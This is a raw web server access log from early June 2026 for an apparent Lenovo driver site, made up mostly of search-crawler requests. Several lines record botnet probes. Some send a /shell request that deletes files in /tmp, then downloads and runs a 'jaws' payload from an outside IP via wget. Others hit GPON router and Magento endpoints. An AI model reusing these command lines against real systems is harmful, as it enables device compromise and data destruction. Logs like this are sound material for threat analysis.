162.159.108.82 - - [31/May/2026:05:30:59 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
162.158.119.176 - - [31/May/2026:05:35:19 +0800] "GET /lenovo/json/IDEAPAD-Z510-NOTEBOOK HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.5862.1669 Mobile Safari/537.36"
162.159.110.55 - - [31/May/2026:05:36:07 +0800] "GET /index.php/lenovo/json/LEGION-Y7000-2019/ HTTP/1.1" 200 2018 "-" "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.9978.1879 Mobile Safari/537.36"
162.159.108.69 - - [31/May/2026:05:37:22 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2067.1128 Mobile Safari/537.36"
172.64.213.9 - - [31/May/2026:08:11:39 +0800] "GET /lenovo/json/V310-15IKB HTTP/1.1" 200 3052 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.64.215.68 - - [31/May/2026:08:13:18 +0800] "GET /index.php/lenovo/json/LEGION-Y7000-2019/ HTTP/1.1" 200 2018 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.68 - - [31/May/2026:08:14:33 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
103.115.199.19 - - [31/May/2026:09:11:59 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 583 "-" "Hello, World"
162.159.108.83 - - [31/May/2026:09:51:24 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.82 - - [31/May/2026:10:27:16 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.82 - - [31/May/2026:12:53:28 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.70.222.118 - - [31/May/2026:17:31:53 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.68.119.7 - - [31/May/2026:17:31:53 +0800] "GET /lenovo/json/V130-14IKB HTTP/1.1" 200 2347 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.64.215.68 - - [31/May/2026:19:48:19 +0800] "GET /lenovo/json/IDEAPAD-Z510-NOTEBOOK HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.71.24.45 - - [31/May/2026:19:49:36 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.70.49.200 - - [31/May/2026:19:49:58 +0800] "GET /lenovo/json/V310-15IKB HTTP/1.1" 200 3052 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.70.223.159 - - [31/May/2026:19:52:02 +0800] "GET /index.php/lenovo/json/LEGION-Y7000-2019/ HTTP/1.1" 200 2018 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.64.215.69 - - [31/May/2026:19:53:17 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.83 - - [31/May/2026:22:47:29 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.71.8.87 - - [31/May/2026:23:35:29 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.5894.1815 Mobile Safari/537.36"
162.159.108.82 - - [01/Jun/2026:01:16:04 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
162.159.110.55 - - [01/Jun/2026:01:54:49 +0800] "GET /index.php/lenovo/json/LEGION-Y7000-2019/ HTTP/1.1" 200 2018 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.69 - - [01/Jun/2026:01:56:05 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.82 - - [01/Jun/2026:01:56:34 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.83 - - [01/Jun/2026:04:17:23 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.110.55 - - [01/Jun/2026:04:27:58 +0800] "GET /index.php/lenovo/json/THINKBOOK-15-IML/ HTTP/1.1" 200 2321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.70.49.201 - - [01/Jun/2026:07:46:54 +0800] "GET /index.php/lenovo/json/LEGION-Y7000-2019/ HTTP/1.1" 200 2018 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.70.49.201 - - [01/Jun/2026:07:47:45 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.70.123.175 - - [01/Jun/2026:09:33:38 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
172.71.24.44 - - [01/Jun/2026:09:33:39 +0800] "GET /magento_version HTTP/1.1" 404 583 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
162.158.119.175 - - [01/Jun/2026:09:33:40 +0800] "GET /rest/V1/store/storeConfigs HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
172.71.8.86 - - [01/Jun/2026:09:34:11 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
162.159.108.69 - - [01/Jun/2026:09:34:12 +0800] "GET /magento_version HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
172.71.8.86 - - [01/Jun/2026:09:34:13 +0800] "GET /rest/V1/store/storeConfigs HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
162.158.119.175 - - [01/Jun/2026:09:34:48 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
172.71.8.87 - - [01/Jun/2026:09:34:49 +0800] "GET /magento_version HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
172.64.213.9 - - [01/Jun/2026:09:34:50 +0800] "GET /rest/V1/store/storeConfigs HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
138.186.161.169 - - [01/Jun/2026:10:39:59 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
162.159.108.83 - - [01/Jun/2026:11:26:43 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.83 - - [01/Jun/2026:13:04:16 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.83 - - [01/Jun/2026:14:10:49 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.83 - - [01/Jun/2026:19:14:14 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.64.213.9 - - [01/Jun/2026:19:37:14 +0800] "GET /lenovo/json/LENOVO-Z50-70 HTTP/1.1" 200 3143 "http://admin.lenovo-drivers.com/lenovo/json/LENOVO-Z50-70" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
172.70.222.99 - - [01/Jun/2026:19:41:21 +0800] "GET /lenovo/json/130-15IKB HTTP/1.1" 200 2102 "http://admin.lenovo-drivers.com/lenovo/json/130-15IKB" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
162.159.110.55 - - [01/Jun/2026:21:34:41 +0800] "GET /lenovo/json/IDEAPAD-Z510-NOTEBOOK HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.70.123.175 - - [01/Jun/2026:21:36:05 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.83 - - [01/Jun/2026:21:36:55 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
172.71.8.86 - - [01/Jun/2026:23:08:37 +0800] "GET /lenovo/json/IDEAPAD-Z510-NOTEBOOK HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.70.223.160 - - [01/Jun/2026:23:10:01 +0800] "GET / HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.68 - - [01/Jun/2026:23:11:52 +0800] "GET /index.php/lenovo/json/LEGION-Y7000-2019/ HTTP/1.1" 200 2018 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.70.49.201 - - [01/Jun/2026:23:12:49 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.158.119.176 - - [02/Jun/2026:01:38:56 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.82 - - [02/Jun/2026:01:45:01 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.70.49.201 - - [02/Jun/2026:02:02:09 +0800] "HEAD / HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 (compatible; +https://developers.cloudflare.com/security-center/)"
162.159.108.82 - - [02/Jun/2026:02:02:23 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.158.119.176 - - [02/Jun/2026:02:02:39 +0800] "GET /index.php/lenovo/json/LEGION-Y7000-2019/ HTTP/1.1" 200 2018 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.6312.1794 Mobile Safari/537.36"
172.70.49.201 - - [02/Jun/2026:02:05:04 +0800] "GET /lenovo/json/IDEAPAD-Z510-NOTEBOOK HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.4949.1563 Mobile Safari/537.36"
162.159.108.83 - - [02/Jun/2026:03:07:02 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.4; robots.txt; +https://openai.com/searchbot"
172.70.123.176 - - [02/Jun/2026:04:32:42 +0800] "GET /index.php/lenovo/json/LEGION-Y7000-2019/ HTTP/1.1" 200 2018 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.71.24.45 - - [02/Jun/2026:04:33:32 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.71.24.44 - - [02/Jun/2026:04:52:48 +0800] "GET /lenovo/json/IDEAPAD-Z510-NOTEBOOK HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.69 - - [02/Jun/2026:07:23:33 +0800] "GET /lenovo/json/V310-15IKB HTTP/1.1" 200 3052 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.9456.1350 Mobile Safari/537.36"
172.70.123.175 - - [02/Jun/2026:07:25:59 +0800] "GET /index.php/lenovo/json/LEGION-Y7000-2019/ HTTP/1.1" 200 2018 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.7730.1586 Mobile Safari/537.36"
162.159.108.68 - - [02/Jun/2026:07:26:49 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.9850.1634 Mobile Safari/537.36"
162.159.108.83 - - [02/Jun/2026:08:26:55 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.110.54 - - [02/Jun/2026:09:57:40 +0800] "GET /lenovo/json/IDEAPAD-Z510-NOTEBOOK HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.69 - - [02/Jun/2026:10:01:32 +0800] "GET / HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.68 - - [02/Jun/2026:11:34:39 +0800] "GET /index.php/lenovo/json/LEGION-Y7000-2019/ HTTP/1.1" 200 2018 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.158.119.176 - - [02/Jun/2026:11:35:29 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.110.55 - - [02/Jun/2026:11:36:38 +0800] "GET /lenovo/json/IDEAPAD-Z510-NOTEBOOK HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.83 - - [02/Jun/2026:12:33:43 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
5.61.209.33 - - [02/Jun/2026:13:42:24 +0800] "GET /logon.htm HTTP/1.1" 404 1142 "-" "Hello World"
172.64.213.8 - - [02/Jun/2026:14:28:38 +0800] "GET / HTTP/1.1" 200 12727 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
172.70.222.98 - - [02/Jun/2026:17:35:15 +0800] "GET / HTTP/1.1" 200 12727 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
162.159.108.83 - - [02/Jun/2026:18:01:02 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
172.68.119.8 - - [02/Jun/2026:18:24:15 +0800] "GET / HTTP/1.1" 499 0 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
162.159.108.82 - - [02/Jun/2026:18:39:05 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
103.26.82.54 - - [02/Jun/2026:20:14:44 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 583 "-" "Hello, World"
162.159.108.82 - - [02/Jun/2026:20:33:17 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
172.68.119.7 - - [02/Jun/2026:21:49:17 +0800] "GET / HTTP/1.1" 499 0 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
172.70.222.118 - - [02/Jun/2026:23:02:22 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Bravebot/1.0; +https://search.brave.com/help/brave-search-crawler) Chrome/W.X.Y.Z Safari/537.36"
172.68.119.8 - - [02/Jun/2026:23:02:27 +0800] "GET /lenovo/json/IDEAPAD-Z580 HTTP/1.1" 200 3397 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0"
103.145.108.102 - - [03/Jun/2026:06:22:38 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
162.159.108.83 - - [03/Jun/2026:06:24:25 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.64.215.68 - - [03/Jun/2026:06:24:25 +0800] "GET /index.php/lenovo/json/V530S-07ICR/ HTTP/1.1" 200 2527 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.108.82 - - [03/Jun/2026:06:34:49 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
164.163.46.48 - - [03/Jun/2026:07:03:44 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
164.163.46.48 - - [03/Jun/2026:07:03:44 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
160.20.203.125 - - [03/Jun/2026:07:08:11 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
162.159.108.82 - - [03/Jun/2026:07:10:36 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.70.123.176 - - [03/Jun/2026:07:10:36 +0800] "GET /index.php/lenovo/json/THINKVISION-LT1712P-MONITOR/ HTTP/1.1" 200 361 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
38.158.200.153 - - [03/Jun/2026:07:15:28 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
162.159.108.83 - - [03/Jun/2026:07:58:56 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.71.8.86 - - [03/Jun/2026:07:58:57 +0800] "GET /index.php/lenovo/json/THINKCENTRE-M90A-GEN-2/ HTTP/1.1" 200 3486 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.108.82 - - [03/Jun/2026:08:32:20 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.83 - - [03/Jun/2026:09:03:16 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.110.54 - - [03/Jun/2026:09:03:16 +0800] "GET /index.php/lenovo/json/IDEAPAD-3-17ADA05/ HTTP/1.1" 200 1915 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.70.222.99 - - [03/Jun/2026:09:11:43 +0800] "GET /index.php/lenovo/json/V30A-24IML/ HTTP/1.1" 200 2089 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.108.82 - - [03/Jun/2026:09:42:15 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.64.213.8 - - [03/Jun/2026:09:42:16 +0800] "GET /index.php/lenovo/json/V55T-GEN-2-13ACN/ HTTP/1.1" 200 1931 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.108.83 - - [03/Jun/2026:09:50:01 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.64.215.68 - - [03/Jun/2026:09:50:02 +0800] "GET /index.php/lenovo/json/LEGION-7-16ACHG6/ HTTP/1.1" 200 2177 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.70.222.119 - - [03/Jun/2026:09:57:35 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
195.62.50.26 - - [03/Jun/2026:09:58:08 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
181.189.91.65 - - [03/Jun/2026:11:17:38 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
162.159.108.83 - - [03/Jun/2026:11:30:46 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.64.213.8 - - [03/Jun/2026:11:30:47 +0800] "GET /index.php/lenovo/json/THINKPAD-E14-GEN-2-TYPE-20T6-20T7/ HTTP/1.1" 200 3007 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.108.83 - - [03/Jun/2026:11:55:27 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.71.24.45 - - [03/Jun/2026:11:55:28 +0800] "GET /index.php/lenovo/json/LENOVO-SMARTCARD-WIRED-KEYBOARD-II/ HTTP/1.1" 200 357 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
